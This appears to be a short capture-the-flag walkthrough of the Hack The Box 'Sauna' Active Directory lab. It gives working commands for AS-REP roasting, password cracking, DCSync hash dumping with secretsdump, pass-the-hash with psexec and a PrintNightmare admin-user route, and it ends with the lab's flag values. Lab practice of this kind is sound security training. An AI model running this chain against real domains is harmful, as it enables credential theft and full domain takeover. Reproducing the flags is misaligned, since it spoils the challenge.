Platform: Hack The Box
IP Address: 10.129.95.180
Difficulty: Easy
Category: Windows / Active Directory
Sauna is an Easy-rated Windows Active Directory machine that starts with username enumeration from a company website and leads into ASREPRoasting. Once initial access is gained via WinRM using a cracked password, privilege escalation is achieved by identifying autologon credentials and using BloodHound to find DCSync rights. The box can also be rooted via PrintNightmare.
fsmith via GetNPUsers.py yields a crackable hash.winPEAS reveals stored autologon creds for svc_loanmgr.svc_loanmgr has DS-Replication-Get-Changes-All, enabling DCSync.secretsdump.py, we dump the Administrator hash.psexec.py with the dumped hash to gain a SYSTEM shell.GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip $target -usersfile users.txt -outputfile hashes.txt
john --wordlist=rockyou.txt hashes.txt
evil-winrm -i $target -u fsmith -p Thestrokes23
# Grab autologon creds with winPEAS
# Login as svc_loanmgr
# Dump domain hashes with secretsdump
secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@$target
psexec.py EGOTISTICAL-BANK.LOCAL/Administrator@$target -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
# Use PrintNightmare to create a new admin user
Invoke-Nightmare via Evil-WinRM
evil-winrm -i $target -u adm1n -p 'P@ssw0rd'
user.txt: d877e054079380297969152d0bfa7750root.txt: 291b6896f3974bbef8b42b7805735bcc